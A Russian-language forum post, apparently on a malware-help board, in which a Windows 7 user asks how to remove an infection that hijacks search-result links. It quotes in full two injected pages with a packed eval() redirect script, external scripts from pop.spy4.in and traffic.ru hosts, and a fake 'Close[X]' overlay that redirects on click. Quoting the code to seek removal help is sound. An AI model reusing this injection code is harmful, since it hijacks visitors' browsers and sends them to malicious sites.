Симптомы следующие. При поиске, к примеру, в Яндексе, почти каждая ссылка из результата поиска перехватывается и вместо ожидаемой страницы возникает либо равномерный серый фон, либо пустой серый прямоугольник наподобие всплывающего окна с единственной надписью Close [X] в правом верхнем углу этого "окна".
Исходный код страницы с серым фоном:
Код:
<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 1=8.9.a(/(b)|(e)|(f)|(h)|(j)|(k)|(l)|(m)|(n)|(o)|(p)|(q)|(r)|(s)|(u-)|(w)|(x)|(y)|(z)|(A)|(B)|(C)|(D)|(E)|(F)|(G)|(0-c)|(0-d)|(0-g)|(H-)|(I)|(J)|(2)|(K)|(L)|(M)|(N-)|(O)|(P)|(Q-)|(R)|(S)|(T)|(U)|(V)|(W)|(X)|(Y)|(Z)|(10)|(11)|(12)|(13)|(14)|(15)|(16)|(17)|(18-)|(19-)|(1a)|(1b)|(1c-)|(1d)|(1e-)|(1f)|(1g)|(1h)|(1i)|(1j-)|(1k)|(t-1l)|(1m)|(1n-)|(1o)|(1p-)|(1q)|(1r)|(1s-v)|(1t)|(1u)|(3-)|(1v)|(1w)|(1x)|(1y)|(1z)|(4)|(4)|(5)|(5-)|(6.1A)|(6.1B)|(1C.1D)|(1E)|(1F)|(1G)|(1H)|(2)|(3)|(1I)|(1J)|(1K)|(1L)|(1M)|(1N)|(1O)|(1P.1Q)|(1R)|(1S)/i);1T(1){1U.1V.1W="1X"}',62,122,'lg|ismobile|midp|wap|winw|xda|up|var|navigator|userAgent|match|acs|||alav|alca||amoi||audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc||cmd||dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lge|maui|maxo|mits|mmef|mobi|mot|moto|mwbp|nec|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany|sch|sec|send|seri|sgh|shar|sie|siem|smal|smar|sony|sph|symb|mo|teli|tim|tosh|tsm|upg1|upsi|vk|voda|w3cs|wapa|wapi|wapp|wapr|webc|browser|link|windows|ce|iemobile|mini|mmp|symbian|phone|pocket|mobile|android|pda|PPC|Series60|Opera|Mini|ipad|iphone|if|document|location|href|http://mobi-go.in/l=32411c1807600b4d0355175e07545e0b3513141e'.split('|'),0,{}));</script><script language="javascript" type="text/javascript" src="http://pop.spy4.in/6jvejwr5fdp5e9o8o4c4ycz477muamt"></script><div class="ccs"> </div><script charset="windows-1251" type="text/javascript" language="javascript" src="http://pop.spy4.in/638r8zt5sf16uxe18fyzo48s8ghy7e62r5pdz3138?&5nfoyntg=t2078501&8edl2sqq5hmndp=http%3A//www.etm.ru/cat/nn/5012044/&3ea68=0&2ks9r=0&38nww=0&2jdoh=0&15pwjfa79q=0&1as2vsk8yj=0&60iitz7h4d7=0&532mcuqlttsifr=0&4fuwcemt=1"></script><div id='NBj270' style='z-index: 2147483647'><div id='l779' class="-1" style='opacity:0.3;filter:alpha(opacity=30);-moz-opacity:0.3;-khtml-opacity:0.3;background-color:#000;top:0;left:0;width:100%;height:100%;z-index:2147483646;position: absolute;'></div><script type="text/javascript"> if ( document.addEventListener ) { (document.body || document.documentElement).addEventListener('click', function ( event ) { if ( event.data === 'richmedia-close' ) { BdZ851(); top.location.href="http://pop.spy4.in/6peybjqhb198mo7d2q9lp47jrd7y33pzp5kd19nnpfkc5sm31phoown5smv5w2u4bc8sqs4ga25ol68qt1ka1buv7ycs44wy5ua50yakmo90lh56j1hhzicjs8jyaaimrio98pvieg6m13w9egbpdh5mhf78lki67mb625kbvkkmk74p740b8frbhn68yaq6m97nyy3iwr8"; return false; } }, false ); } else { (document.body || document.documentElement).attachEvent('onclick', function ( event ) { if ( event.data === 'richmedia-close' ) { BdZ851(); top.location.href="http://pop.spy4.in/6peybjqhb198mo7d2q9lp47jrd7y33pzp5kd19nnpfkc5sm31phoown5smv5w2u4bc8sqs4ga25ol68qt1ka1buv7ycs44wy5ua50yakmo90lh56j1hhzicjs8jyaaimrio98pvieg6m13w9egbpdh5mhf78lki67mb625kbvkkmk74p740b8frbhn68yaq6m97nyy3iwr8"; return false; } } ); } </script> <script async defer charset="UTF-8" type="text/javascript" src="http://handler.new.traffic.ru/0rbqzy1mc70zz61tti4w17df887yf7?fr=adzagl"></script></div>
Исходный код страницы с "всплывающим окном":
Код:
<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 1=8.9.a(/(b)|(e)|(f)|(h)|(j)|(k)|(l)|(m)|(n)|(o)|(p)|(q)|(r)|(s)|(u-)|(w)|(x)|(y)|(z)|(A)|(B)|(C)|(D)|(E)|(F)|(G)|(0-c)|(0-d)|(0-g)|(H-)|(I)|(J)|(2)|(K)|(L)|(M)|(N-)|(O)|(P)|(Q-)|(R)|(S)|(T)|(U)|(V)|(W)|(X)|(Y)|(Z)|(10)|(11)|(12)|(13)|(14)|(15)|(16)|(17)|(18-)|(19-)|(1a)|(1b)|(1c-)|(1d)|(1e-)|(1f)|(1g)|(1h)|(1i)|(1j-)|(1k)|(t-1l)|(1m)|(1n-)|(1o)|(1p-)|(1q)|(1r)|(1s-v)|(1t)|(1u)|(3-)|(1v)|(1w)|(1x)|(1y)|(1z)|(4)|(4)|(5)|(5-)|(6.1A)|(6.1B)|(1C.1D)|(1E)|(1F)|(1G)|(1H)|(2)|(3)|(1I)|(1J)|(1K)|(1L)|(1M)|(1N)|(1O)|(1P.1Q)|(1R)|(1S)/i);1T(1){1U.1V.1W="1X"}',62,122,'lg|ismobile|midp|wap|winw|xda|up|var|navigator|userAgent|match|acs|||alav|alca||amoi||audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc||cmd||dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lge|maui|maxo|mits|mmef|mobi|mot|moto|mwbp|nec|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany|sch|sec|send|seri|sgh|shar|sie|siem|smal|smar|sony|sph|symb|mo|teli|tim|tosh|tsm|upg1|upsi|vk|voda|w3cs|wapa|wapi|wapp|wapr|webc|browser|link|windows|ce|iemobile|mini|mmp|symbian|phone|pocket|mobile|android|pda|PPC|Series60|Opera|Mini|ipad|iphone|if|document|location|href|http://mobi-go.in/l=32411c1807600b4d0355175e07545e0b3513141e'.split('|'),0,{}));</script><script language="javascript" type="text/javascript" src="http://pop.spy4.in/6jvejwr5fdp5e9o8o4c4ycz477muamt"></script><div class="ccs"> </div><script charset="windows-1251" type="text/javascript" language="javascript" src="http://pop.spy4.in/83aw8akg7x97jvczluyg4458qtu9msy0z5fitir7o?&5hilmhw4=t66772180&5mlp9b2sbpmllp=http%3A//www.grinenergosnab.ru/tovari-detail/10-1151/&3mpkw=0&34g7z=0&46djk=0&4n8ch=0&wd5xj92z2=0&12zgpjvbdn=0&60iitz7h4d7=0&7e7uvfgk0n4hnb=0&612slzx1=1"></script><div id='naH725' style='z-index: 2147483647'><div id='hS997' style='cursor:pointer; background:#000; position:absolute; z-index:2147483647; left:50%; top: 50%; margin-top: -40px; margin-left: -234px; width: 468px; height: 80px; position: absolute;'> <table width='468' height='80' cellspacing='0' cellpadding='0' style='border: 2px double black; background-color: #666666;'> <tr height='20'> <td width='80%' style='text-align: left;' align='left'> <style type="text/css"> span#G465 a { color: #ddd; padding: 0 0 0 4px; text-decoration: underline; font: bold 13px arial; text-transform: none; letter-spacing: normal; line-height: normal; } span#G465 a:hover { color: #fff; } div#hS997 * { padding: 0; margin: 0; } div#m301, div#m301 * { vertical-align : middle; color: #FFFFFF; text-decoration: none; font: bold 13px arial; text-transform: none; letter-spacing: normal; line-height: normal; } </style> <span id='G465'><script async defer charset="UTF-8" type="text/javascript" src="http://handler.new.traffic.ru/0qjos4diza10r89nhlhs19bkrse6tf?fr=adtop"></script></span> </td> <td width='20%' style='padding-right: 1px; text-align: right;' align='right'> <div id="m301" onclick="GWg401()"> <a style="position: absolute; right: 6px; top: 4px; z-index: 1;color: #FFFFFF; text-decoration: none; font: bold 13px arial; text-transform: none; letter-spacing: normal; line-height: normal;" id="llkaookIjshjd" title="Close" href="javascript:a970()" onload="document.getElementById('llkaookIjshjd').style.display='none';">Close[X]</a> <div style="position: relative; top: 0; left: 0; z-index: 5;"> <script async defer charset="UTF-8" type="text/javascript" src="http://handler.new.traffic.ru/0ws6ipq91t1ahzzgcrgw13h453vhmr?data=90k6u4gfhul760hkiemqzc6p9uhxosdw589d57btzbik63p6kzgcg7r5erzqsmif6g8yabw39e1c57uy2lrl02877khwp1gmgpe8sr8vrpu24l8ybzspirb486ecljkw57ih5psaxi1oduk538y7hzx05v8p9aaqj95vu8pymt5qtq1l53y6950124y79boqlgkzru3iwr8"></script> </div> </div> <!-- <a style='color: #FFFFFF; text-decoration: none; font: bold 13px arial; text-transform: none; letter-spacing: normal; line-height: normal;' title='Close' href='javascript:a970()'>Close[X]</a> --> </td> </tr> <tr> <td height='60' width='468' colspan='2' bgcolor='#CCCCCC'> <iframe src='http://pop.spy4.in/yaim.php?ad=7&t=2' width='468' height='60' scrolling='no' frameborder='0'> </iframe> </td> </tr> </table> </div></div>
Замечены редиректы с ссылок как в IE8, так и в последней Opera (12.11). Чистка кэша браузеров и %TEMP% не помогает для IE точно, Opera вроде сутки работает без редиректов.
ОС Windows 7 Pro x64, штатный антивирус Kaspersky for Workstations 6.0.
Сканировал CureIT и Virus Removal Tool, в т.ч. в Safe mode, оба не находят ничего.
Хотелось бы узнать, что это за зверь, где висит и как вывести. Заранее спасибо!
virusinfo_syscure.zip
virusinfo_syscheck.zip
hijackthis.log